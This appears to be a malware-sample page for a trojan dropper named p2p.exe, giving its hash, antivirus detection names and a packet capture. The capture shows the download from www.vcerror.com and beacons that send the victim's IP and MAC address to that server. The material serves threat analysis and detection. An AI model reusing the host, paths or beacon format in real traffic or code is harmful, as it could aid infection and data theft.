Download Attachments
p2p
Date added: October 26, 2016 5:32 am
Added by: admin
File size: 25 KB
Downloads: 239
SHA256: ef794b9a3b72ae5524e17ecccf330eb16f2cc74f3e7fe7cb2667acefdea4b3a3
File name: p2p.exe
Detection ratio: 47 / 55
Analysis date: 2016-10-26 21:33:06 UTC (0 minutes ago)
Antivirus results (vendor, detection name, signature date):
AVG               Generic37.DEP                          20161026
AVware            Trojan.Win32.Generic!BT                20161026
Ad-Aware          Gen:Trojan.Heur.fmKfXCDIycnj           20161026
AegisLab          Troj.Dropper.W32.Injector!c            20161026
AhnLab-V3         Malware/Win32.Generic.N1843405561      20161026
Antiy-AVL         Trojan[Dropper]/Win32.Injector         20161026
Arcabit           Trojan.Heur.fmKfXCDIycnj               20161026
Avast             Win32:Rofin-A [Trj]                    20161026
Avira (no cloud)  TR/Crypt.FKM.Gen                       20161026
2016-10-25 23:20:18.175277 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /YW/p2p/p2p.exe HTTP/1.1
GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:18.419780 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [.], ack 2921, win 256, length 0
—
2016-10-25 23:20:26.821311 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [P.], seq 0:103, ack 1, win 256, length 103: HTTP: GET /YW/p2p/ver.dat HTTP/1.1
GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:26.823460 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6157, win 32754, length 0
2016-10-25 23:20:26.853146 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6754, win 32680, length 0
2016-10-25 23:20:27.116031 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [.], ack 318, win 255, length 0
—
2016-10-25 23:20:27.513843 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
2016-10-25 23:20:27.850658 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [.], ack 1297, win 251, length 0
—
2016-10-25 23:20:30.265197 IP 192.168.1.102.61060 > 123.57.11.22.80: Flags [P.], seq 0:364, ack 1, win 256, length 364: HTTP: GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache